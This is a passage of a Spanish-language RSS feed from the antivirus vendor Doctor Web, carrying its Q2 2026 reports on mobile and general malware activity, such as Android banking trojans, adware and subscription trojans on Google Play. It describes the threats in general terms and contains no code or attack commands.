cifrada&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Tras descifrarla, el troyano obtiene el dominio C2 al que se conecta para descargar una carga útil similar a la de la segunda etapa.&lt;/p&gt;&lt;p&gt;El análisis del funcionamiento del troyano permite concluir que se trata de una amenaza especialmente peligrosa, ya que combina múltiples funciones maliciosas. Para evitar la infección del equipo y frenar la propagación del troyano, recomendamos mantener las bases de datos del antivirus siempre actualizadas y analizar todos los archivos descargados de Internet. Los usuarios de Dr.Web Security Space y Dr.Web Desktop Security Suite pueden estar tranquilos, ya que los antivirus Dr.Web detectan y eliminan el troyano de forma segura. Asimismo, los archivos de tipo .vcxproj, .csproj e imgui se desinfectan, eliminándose de ellos el código malicioso.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15274&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus para dispositivos móviles en el II trimestre de 2026</title><link>https://news.dr-web.es/show/?i=15274&amp;lng=es&amp;c=5</link><pubDate>Wed, 01 Jul 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;1 de julio de 2026&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según los datos estadísticos de detecciones de Dr.Web Security Space para dispositivos móviles, en el II trimestre del año 2026 se observó una reducción de la actividad de los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — un 31,83% comparado con el I trimestre. Sin embargo, los mismos siguieron siendo el malware más detectado para Android: a esta familia se requiere un 23,28% de detecciones de amenazas de ese tipo. Este malware roba varios tipos de datos privados, tales como los SMS con códigos de un solo uso de entidades de crédito, nombres de usuario y contraseñas de las cuentas de la banca en línea, y además puede visualizar las ventanas phishing. Igual que en el trimestre pasado, los usuarios afrontaron con mayor frecuencia la subfamilia Android.Banker.Mamont, que incluye varios tipos de malware.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Durante los tres meses pasados siguió reduciéndose la actividad de los troyanos publicitarios de las familias &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Además, siguen siendo algunas de las amenazas de malware para Android más frecuentes, y determinadas variantes continúan figurando entre el malware con mayor número de detecciones.&lt;/p&gt;

&lt;p&gt;El software potencialmente peligroso más frecuente volvió a ser, con una cuota superior al 66 %, el formado por aplicaciones cuyo código ha sido modificado mediante la incorporación de código basura para dificultar su análisis (detectadas como &lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Este tipo de modificación se realiza con ayuda de las herramientas de modding de NP Manager. Los ciberdelincuentes también recurren a ellas para proteger malware, como los troyanos bancarios &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, frente a la detección por parte de los antivirus.&lt;/p&gt;

&lt;p&gt;En segundo lugar se situaron las aplicaciones modificadas igualmente mediante la utilidad NP Manager, aunque utilizando otras de sus funciones. Por ejemplo, esta herramienta incluye varios módulos para la protección y ofuscación del código, así como mecanismos para esquivar la verificación de la firma digital de las aplicaciones una vez modificadas. Los autores de malware aprovechan estas capacidades para dificultar la detección de su malware por las soluciones antivirus. Los productos de Dr.Web detectan las aplicaciones alteradas de este modo como &lt;a href="https://vms.dr-web.es/search/?q=Tool.NPMod&amp;lng=es"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Entre las aplicaciones potencialmente peligrosas más frecuentes también volvieron a figurar las modificadas mediante la utilidad &lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Para llevar a cabo estas modificaciones, la herramienta descarga de Internet los scripts especialmente diseñados para ello.&lt;/p&gt;

&lt;p&gt;Los programas no deseados más activos en el II trimestre fueron las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; que imitan el funcionamiento de los antivirus. Supuestamente, detectan algunas amenazas y luego proponen adquirir una versión completa para “afrontar” las mismas. Estas versiones modificadas representaron más del 44 % del software no deseado detectado en dispositivos Android.&lt;/p&gt;

&lt;p&gt;El adware más frecuente fue el formado por los módulos &lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, que pueden integrarse en aplicaciones para Android. Estos módulos muestran notificaciones publicitarias engañosas y también recopilan varios datos confidenciales.&lt;/p&gt;

&lt;p&gt;Además, los usuarios siguieron afrontando los optimizadores &lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. . Estas aplicaciones generan periódicamente notificaciones con mensajes engañosos sobre supuestos errores del sistema y falta de memoria RAM, y muestran publicidad durante el proceso de «optimización».&lt;/p&gt;

&lt;p&gt;Las aplicaciones publicitarias &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. También volvieron a registrar una elevada actividad. Los ciberdelincuentes las hacen pasar por aplicaciones con trucos para videojuegos que supuestamente permiten obtener recursos dentro de los juegos. En realidad, estas aplicaciones únicamente cargan sitios web con publicidad.&lt;/p&gt;

&lt;p&gt;A principios de junio, los expertos de la empresa Doctor Web informaron sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; — un troyano capaz de esquivar las restricciones del SO Android y visualizar publicidad en modo de segundo plano. Para ello, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; usa las aplicaciones terceras, así como las metodologías determinadas que seleccione en función del fabricante del dispositivo infectado. Para más información sobre este troyano, consulte el &lt;a href="https://news.dr-web.es/show/?i=15262" target="_blank"&gt;material&lt;/a&gt; correspondiente en nuestro sitio web.&lt;/p&gt;

&lt;p&gt;Asimismo, durante el segundo trimestre, los analistas de virus de Doctor Web otra vez detectaron en Google Play malware destinado a suscribir a los usuarios a servicios de pago, incluidos representantes de las familias &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendencias clave del II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; siguieron siendo malware más popular para el SO Android.&lt;/li&gt;
        &lt;li&gt;Los creadores de virus siguieron usando activamente las herramientas de modding de aplicaciones Android para evitar que los antivirus detecten los troyanos bancarios. &lt;/li&gt;
        &lt;li&gt;La actividad de los troyanos de publicidad &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; bajó otra vez.&lt;/li&gt;
        &lt;li&gt;Fue detectado un troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, que usa aplicaciones terceras para esquivar las restricciones del SO Android y visualizar publicidad en segundo plano.  &lt;/li&gt;
        &lt;li&gt;Nuevo malware apareció en el catálogo Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos de Dr.Web Security Space para dispositivos móviles&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Click&amp;lng=es"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de mods maliciosos de WhatsApp capaces de cargar varios sitios web en segundo plano sin permiso del usuario.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano publicitario diseñado para mostrar publicidad intrusiva. Los representantes de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; suelen distribuirse haciéndose pasar por aplicaciones legítimas y, en algunos casos, son instalados por otro malware en el directorio del sistema. Tras infectar un dispositivo Android, suelen ocultar su presencia al usuario, por ejemplo, al eliminar el icono de la aplicación del menú principal.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano bancario que intercepta los mensajes SMS con códigos de un solo uso enviados por entidades financieras, así como el contenido de las notificaciones, y además recaba otra información confidencial. Entre los datos que puede obtener se incluyen la información técnica sobre el dispositivo infectado, la lista de aplicaciones instaladas, los datos de la tarjeta SIM, el historial de llamadas telefónicas y los mensajes SMS recibidos y enviados..&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano que carga el sitio web indicado en su configuración. Las modificaciones conocidas de este malware cargan páginas de casinos en línea.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de programas publicitarios que imitan el funcionamiento de un antivirus. Estas aplicaciones pueden alertar sobre amenazas inexistentes y engañar a los usuarios para que adquieran la versión completa de pago.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones que supuestamente permiten ganar dinero al realizar determinadas tareas o actividades. Estos programas simulan la acumulación de recompensas y exigen alcanzar una cantidad mínima para poder retirar los supuestos ingresos. Por lo general, incluyen una lista de sistemas de pago y entidades bancarias populares a través de los cuales, supuestamente, es posible cobrar las recompensas. Sin embargo, incluso cuando los usuarios consiguen reunir la cantidad requerida, los pagos prometidos nunca llegan a efectuarse. Esta detección también se utiliza para identificar otro software no deseado basado en el código de este tipo de aplicaciones.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones Android cuyo código ha sido modificado mediante herramientas de modding para incorporar código basura. Este tipo de modificación tiene como objetivo dificultar el análisis y la comprensión de la lógica interna de las aplicaciones. Se trata de una técnica habitual tanto en troyanos bancarios como en versiones pirateadas de software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones Android modificadas mediante la utilidad NP Manager. Esta herramienta incorpora módulos para la ofuscación y protección del código, así como mecanismos para esquivar la verificación de la firma digital de las aplicaciones una vez modificadas. La ofuscación que aplica se utiliza con frecuencia en malware para dificultar su detección y análisis.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una utilidad que permite modificar aplicaciones Android instaladas (crear parches para ellas) con el fin de alterar su funcionamiento o esquivar determinadas restricciones. Por ejemplo, puede utilizarse para intentar desactivar la comprobación de acceso root en aplicaciones bancarias o para obtener recursos ilimitados en videojuegos. Para crear los parches, la herramienta descarga de Internet scripts especialmente preparados, que cualquier usuario puede desarrollar y añadir a una base de datos compartida. La funcionalidad de estos scripts puede resultar incluso maliciosa, por lo que los parches generados pueden suponer un riesgo potencial para la seguridad.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones de optimización que con cierta periodicidad generan notificaciones engañosas sobre una supuesta falta de memoria y errores del sistema con el fin de mostrar publicidad durante el proceso de «optimización».&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Aplicaciones que se presentan como herramientas para obtener recursos en videojuegos mediante trucos o ventajas especiales. En realidad, han sido creadas para mostrar publicidad. Estos programas reciben de un servidor remoto una configuración que determina qué sitio web debe cargarse para mostrar anuncios, ya sean banners, ventanas emergentes, vídeos publicitarios u otros formatos similares.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un módulo publicitario que puede integrarse en aplicaciones Android. Este componente muestra notificaciones publicitarias engañosas que pueden hacerse pasar, por ejemplo, por mensajes del sistema operativo. Además, recopila distintos datos confidenciales y puede descargar otras aplicaciones e iniciar su instalación en el dispositivo.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Fictus&amp;lng=es"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un módulo publicitario que los ciberdelincuentes integran en versiones clonadas de aplicaciones y videojuegos populares para Android. Su incorporación se realiza mediante el empaquetador especializado net2share. Las copias creadas de este modo se distribuyen a través de varios catálogos de aplicaciones y, una vez instaladas, visualizan publicidad no deseada.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Airpush&amp;lng=es"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Complementos integrados en aplicaciones Android que visualizan varios tipos de publicidad. En función de la versión y de la modificación, pueden generar notificaciones publicitarias, ventanas emergentes o banners. Los atacantes los utilizan con frecuencia para propagar malware, proponiendo instalar algún software. Además, estos complementos transmiten a servidores remotos varios datos confidenciales.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Amenazas en Google Play&lt;/h3&gt;

&lt;p&gt;Durante el II trimestre del año 2026, los analistas de virus de la empresa Doctor Web detectaron en el catálogo Google Play varios nuevos programas troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, que suscriben a usuarios a servicios de pago. Se propagaron camuflados por software de varios tipos: una plataforma de streaming ShowLounge - TV &amp; Dramas (&lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;), un programa para gamers AIM: Crosshair Asist (&lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;), un juego True Cargo Drive (&lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;), una utilidad Battery 3D: Charge Effects (&lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;) y un editor de imágenes PixStudio - Photo Editor (&lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;). En total, fueron descargados al menos 2 600 000 veces.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Unos ejemplos de programas troyanos &lt;b&gt;Android.Subscription&lt;/b&gt;, detectados en Google Play en el II trimestre de 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;El malware de este tipo carga los sitios web donde con la tecnología Wap Click se conectan suscripciones móviles de pago a los usuarios. A las víctimas potenciales se les solicita su número de móvil y, una vez introducido el mismo, se intentan activarse los servicios correspondientes.&lt;/p&gt;

&lt;p&gt;En Google Play otra vez se difundieron los programas troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, que también suscriben a las víctimas a servicios de pago. Los malintencionados los hacían pasar por messengers Chat Messages (&lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;) y Easy Messages (&lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;), así como las utilidades para optimizar el funcionamiento del sistema Smart File Cleaner, Junk Clean Master y Fast Cleaner (&lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;, &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt; respectivamente).&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un malware donde se ocultaban los troyanos de la familia &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Para proteger los dispositivos en Android contra malware y software no deseado, recomendamos a los usuarios instalar los productos antivirus Dr.Web para Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15275&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus en el II trimestre del año 2026</title><link>https://news.dr-web.es/show/?i=15275&amp;lng=es&amp;c=5</link><pubDate>Wed, 01 Jul 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 de julio de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según las estadísticas de detección del antivirus Dr.Web, durante el segundo trimestre de 2026 el número total de amenazas detectadas aumentó un 5,72 % con respecto al primer trimestre. El número de amenazas únicas creció un 95,32 %. Las amenazas detectadas con mayor frecuencia en los dispositivos protegidos fueron adware y troyanos publicitarios, malware de minería de criptomonedas y troyanos utilizados para ejecutar otras amenazas.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;En el tráfico de correo electrónico se detectaron principalmente scripts maliciosos y varias aplicaciones troyanas, entre ellas descargadores, droppers, ladrones de contraseñas y mineros de criptomonedas. También se observó una amplia difusión de Gateways, documentos de phishing y varios tipos de exploits.&lt;/p&gt;

&lt;p&gt;Los usuarios cuyos archivos se vieron afectados por troyanos cifradores con mayor frecuencia afrontaron los encoders &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; y &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;. Al mismo tiempo, el número de solicitudes de descifrado recibidas por el servicio de soporte técnico de Doctor Web se redujo ligeramente en comparación con el trimestre anterior.&lt;/p&gt;

&lt;p&gt;Durante el segundo trimestre de 2026, los analistas de Internet de Doctor Web observaron un aumento de los ataques de phishing dirigidos a los usuarios del Messenger MAX. Los ciberdelincuentes también aprovecharon la actualidad informativa del momento y adaptaron a ella los fraudes más habituales.&lt;/p&gt;

&lt;p&gt;En abril se supo que una de las actualizaciones de Microsoft Visual Studio Code &lt;a href="https://news.dr-web.es/show/?i=15146" target="_blank"&gt;contenía codigo malicioso&lt;/a&gt;. Se trataba de un script troyano incluido en la biblioteca pública de JavaScript es5-ext, incorporada al software actualizado. Este script se ejecuta cuando detecta que el sistema utiliza la zona horaria de determinadas ciudades rusas y visualiza un mensaje con contenido antirruso en la consola del desarrollador.&lt;/p&gt;

&lt;p&gt;En mayo &lt;a href="https://news.dr-web.es/show/?i=15253" target="_blank"&gt;advertimos&lt;/a&gt; sobre la propagación del malware JobStealer, dirigido a usuarios de Mac y Windows. Los ciberdelincuentes lo distribuían haciéndolo pasar por una aplicación para realizar entrevistas de trabajo en línea. El troyano JobStealer roba la información confidencial de varios tipos, incluidos datos procedentes de alrededor de 300 extensiones de navegador para monederos de criptomonedas, archivos del mensajero Telegram, contraseñas y datos de tarjetas bancarias guardados en los navegadores, así como archivos de cookies.&lt;/p&gt;

&lt;p&gt;En junio, los expertos del laboratorio antivirus de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15262" target="_blank"&gt;informaron&lt;/a&gt; sobre un nuevo troyano publicitario, &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, que visualizaba publicidad en segundo plano gracias a su posibilidad de esquivar las restricciones del sistema operativo Android. Para ello, explota aplicaciones de terceros y selecciona el método más adecuado en función del fabricante del dispositivo objetivo.&lt;/p&gt;

&lt;p&gt;Entre malware para dispositivos Android, los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; mantuvieron el liderazgo por número de detecciones en los dispositivos protegidos. Al mismo tiempo, los creadores de malware siguieron utilizando activamente varias herramientas de modificación de aplicaciones Android para dificultar la detección de su malware por parte de los antivirus. Asimismo, durante el segundo trimestre, nuestros analistas de virus detectaron en el catálogo de Google Play varios nuevos troyanos diseñados para suscribir a los usuarios a servicios móviles de pago. &lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendencias clave del II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Aumentó el número de amenazas detectadas en dispositivos protegidos.&lt;/li&gt;
        &lt;li&gt;Entre las amenazas detectadas, aumentó bastante el número de archivos únicos.&lt;/li&gt;
        &lt;li&gt;El número de solicitudes de descifrado de archivos afectados por los programas troyanos cifradores bajó comparado con el I trimestre.&lt;/li&gt;
        &lt;li&gt;Los estafadores empezaron a atacar a usuarios del Messenger MAX con mayor frecuencia.&lt;/li&gt;
        &lt;li&gt;Los troyanos bancarios &lt;b&gt;Android.Banker&lt;/b&gt; siguieron siendo el malware más popular para dispositivos en Android.&lt;/li&gt;
        &lt;li&gt;Los expertos de Doctor Web detectaron un troyano de publicidad &lt;b&gt;Android.MagicAd.1&lt;/b&gt;, que puede esquivar las restricciones del SO Android y visualizar anuncios  en segundo plano.&lt;/li&gt;
        &lt;li&gt;Los creadores de virus difundieron el malware JobStealer que sirve para robar los datos privados de los usuarios de equipos con Mac y Windows.&lt;/li&gt;
        &lt;li&gt;En uno de los anuncios de Microsoft Visual Studio Code fue detectado un código malicioso.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos del servicio de estadísticas de Doctor Web&lt;/h3&gt;

